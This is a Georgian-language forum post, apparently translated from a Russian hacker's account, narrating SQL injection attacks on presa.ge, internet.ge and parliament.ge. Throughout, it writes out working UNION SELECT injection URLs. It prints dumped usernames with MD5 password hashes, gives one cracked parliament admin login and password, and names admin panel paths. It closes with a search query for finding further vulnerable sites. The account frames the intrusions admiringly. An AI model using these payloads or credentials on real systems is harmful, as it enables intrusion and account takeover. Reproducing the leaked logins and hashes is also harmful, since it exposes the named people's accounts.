Sign in to follow this  
Followers 0

რუსი ჰაკერის თავდასხმა ქართულ საიტებზე

1 post in this topic

ალბათ გაიგეთ რომ რუსმა ჰაკერმა გატეხა პრესა.ჯი !
ეხლა მე ამაზე დაწვრილებით მოგიყვებით ,ჰაკერმა ვიდეოც კი გადაიღო როგორ ტეხდა პრესა.ჯის .
სამწუხაროდ ვიდეო წაშლილია სერვერიდან და ვერ გაჩვენებთ!
რუსმა ჰაკერმა იმდენი "უჩხიკინა" პრესა ჯი-ს სანამ არ აღმოაჩინა sql დაუცველობა ,რომელიც იყო აი აქ :

[color="#0000FF"]http://www.presa.ge/index.php?text=news&i=-1+sql-მოთხოვნა[/color]

ჰაკერმა მოთხოვნაში შეიყვანა version(), user() და მიიღო საჭირო ინფორმაცია .

[color="#0000FF"]user() - presa_ge@localhost
version() - 5.0.51[/color]

mysql 5 იყო დაყენებული .
ცხრილების გამოცნობა დიდ პრობლემას არ წარმოადგენდა :

[color="#0000FF"]http://www.presa.ge/index.php?text=news&i=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+21,1--[/color]

ცხრილ users ში მხოლოდ ერთი ველი იყო .

[color="#0000FF"]http://www.presa.ge/index.php?text=news&i=-1+union+select+1,2,count(*),4,5,6,7,8,9,10,11+from+users--[/color]

ამის შემდეგ ლოგინის და პაროლის ამოღება რთული არ ყოფილა:

[color="#0000FF"]http://www.presa.ge/index.php?text=news&i=-1+union+select+1,2,concat(user_username,char(58),user_password),4,5,6,7,8,9,10,11+from+users+limit+0,1--[/color]

აი შედეგიც:

[color="#0000FF"]presa.ge:c1ab283404b71a940807009023a764bd[/color]

როგორც ჩანს პაროლი ჰეშირებულია md5 ალგორითმით.
ჰაკერმა ადმინკის ადგილმდებარეობა მაინც ვერ გაიგო .
პაროლის გამოცნობა მან ბრუტერით შეძლო და განაგრძო მსხვერპლის ძებნა .

ამჯერად მაღალი PR ს გამო ჰაკერის ყურადღება მიიპყრო www.internet.ge -მ
საიტის სკანირებამ აჩვენა რომ საიტს ჰოსტავდა 10 ქართული რესურსი :

[color="#0000FF"]astrology.internet.ge [212.72.130.138]
dsl.ge [212.72.130.138]
dsl.online.ge [212.72.130.138]
magistrali.ge [212.72.130.138]
www.adsl.ge [212.72.130.138]
www.caucasus.net [212.72.130.138]
www.caucasusonline.ge [212.72.130.138]
www.ge [212.72.130.138]
www.georgia.net.ge [212.72.130.138]
www.internet.ge [212.72.130.138]
www.online.ge [212.72.130.138]
www.sanet.ge [212.72.130.138][/color]

ძირითად დომეინზე (www.internet.ge) მან დაუცველობები ვერ ნახა ,მაგრამ ანალოგიური დაუცველობა აღმოჩნდა inews.internet.ge ზე

[color="#0000FF"]http://inews.internet.ge/stat_relatives.html?date=2008-08-09&stat=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+25,1/*[/color]

"უფლებების" უქონლობის გამო მან ვერ შეასრულა ყველა მოთხოვნა ბაზასთან მაგრამ სამაგიეროდ იპოვა ადმინკა :

[color="#0000FF"]http://www.internet.ge/admin/[/color]

[b]კონტრ დარტყმა [/b]
ქართული სამთავრობო საიტების დათვალიერებისას მან აირჩია შემდეგი მსხვერპლი www.parliament.ge .
სტრუქტურის სკანირების მას დახვდა შემდეგი სურათი :

[color="#0000FF"]- files (კატალოგი) - შეიცავდა ბევრ pdf-დოცუმენტს:
100_18166_776783_demands.pdf
1048_16533_150665_jandacva.pdf
1048_16533_216628_ADCHARA.pdf
1048_16533_243251_adamianisyflebata.pdf
1048_16533_788983_axalgazrdaiuristTaasociacia.pdf
1049_16559_119653_08_Page_01.pdf
1049_16559_173943_07_Page_01.pdf
1049_16559_194949_08_Page_02.pdf
1049_16559_263487_region_april.pdf
...etc

- newsletter (კატალოგი) - შეიცავდა:
2006
laws15
laws16

- pages (კატალოგი) - შეიცავდა:
photos_dep_08_12

-archive_en (კატალოგი) - შეიცავდა:
parl92
parl99
[/color]

ძრავი იყო php ზე დაწერილი ,მან აღმოაჩინა დაუცველობა index.php ში ,უფილტრო პარამეტრში "sec_id" :
თვით მოთხოვნა იყო ესეთი :

[color="#0000FF"]http://www.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-1+sql-მოთხოვნა[/color]

users() და version() მა აჩვენა რომ :

[color="#0000FF"]
user: dato@localhost
version: 5.0.51a-log[/color]

მან აღმოაჩინა ცხრილი "users" საიდანაც ამოიღო პაროლები :

[color="#0000FF"]http://www.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-1+union+select+1,2,3,4,5,6,7,password,9,10,11, 12,13+FROM+users+limit+1,1--[/color]


concat() ის საშუალებით მან შეაერთა მოთხოვნები და გაიტანა ცხრილი "users" :

[color="#0000FF"]http://www.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-1+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13+from+users+limit+10,1--[/color]

შედეგი ძალიან სიმპათიურად გამოიყურებოდა :

[color="#0000FF"]vivageodea:55e9a83d8533e24df2a3d444aedb48e8
ekaterine:db5fb6fa2471863726e685490b97eb18
natisu:c713e1fcb5aff9589f7a324f7f921274
irina:66fbac9b06bedcefa0db4f21801e0c8e
manana:3653d0afb2d74de57c3e13ee2fe38b97
dgogich:703042aefd627a8c86c4de140cc80c6e
improvi:049cbc233e47e7ed04f3e230f1617458
natato:52831a7af0cfd924e39b17d1a11c69f1
ml:90a4f54798b26764dc83f6e50532ea77
elene:fa332b2c68e40f0515108363a130a7f1
dika:e9ce15bcebcedde2cb3cf9fe8f84fc0c:
kalim:5552477fe66043d09b6f19951a5925f9
lika:85f5fed488c6eedfc68848d6ba403721
kkkkkkk:472c049a51e65aa2623a9f57f0904c07
zazagg:9e2187a19490233e330054a19598ae75
medea:e5b5a57b9d168fbdd42a1e8799dd59c3
datoadam:a884c31c12f6659ec46c39b3208c4f3c
fredi:781d90556013e48ec80a2d273fc29dc5
tamtuka:5e4c29a21d70d4b5185af9c43bf88a10[/color]

პირველივე ექაუნთის პაროლის გაშიფვრისთანავე ის გახდა სისტემის სრულფაოვანი წევრი :
[b]
ლოგინი: vivageodea
პაროლი: eannia
ჰეში: 55e9a83d8533e24df2a3d444aedb48e8[/b]

და უპრობლემოდ შევიდა ადმინკაში :

[color="#0000FF"]http://www.parliament.ge/admin/[/color]

მაგრამ აქ მას დახვდა წარწერა [b]«Forbidden»[/b] ,როგორც ჩანს აიპის დიაპაზონის ფილტრაცია ეყენათ
ჰაკერმა აღმოაჩინა http://users.parliament.ge რომელიც ამავე ძრავზე მუშაობდა და შესაბამისად ანალოგიური ბაგები ჰქონდა :

[color="#0000FF"]http://users.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-1+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13+from+users+limit+10,1--[/color]

ადმინკა ადვილი საპოვნელი იყო

[color="#0000FF"]http://users.parliament.ge/admin/[/color]

რა მოხდა შემდეგ ახსნას აზრი აღარ აქვს ,მან დაგუგლა შემდეგი მოთხოვნა

[b]inurl:.ge + inurl:"/index.php?lang_id=ENG"[/b]

და იპოვა ათობით დაუცველი სკრიპტი ,მაგრამ ეს უკვე სხვა ისტორიაა .

ეს სტატია ნათარგმნია რუსული ენიდან ,რომელიც დაწერილია თვით რუსი ჰაკერის მიერ და ვიდეოც ახლავს თან !

[b]გიორგი დარბაიძე[/b] Edited by giorgi711
0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0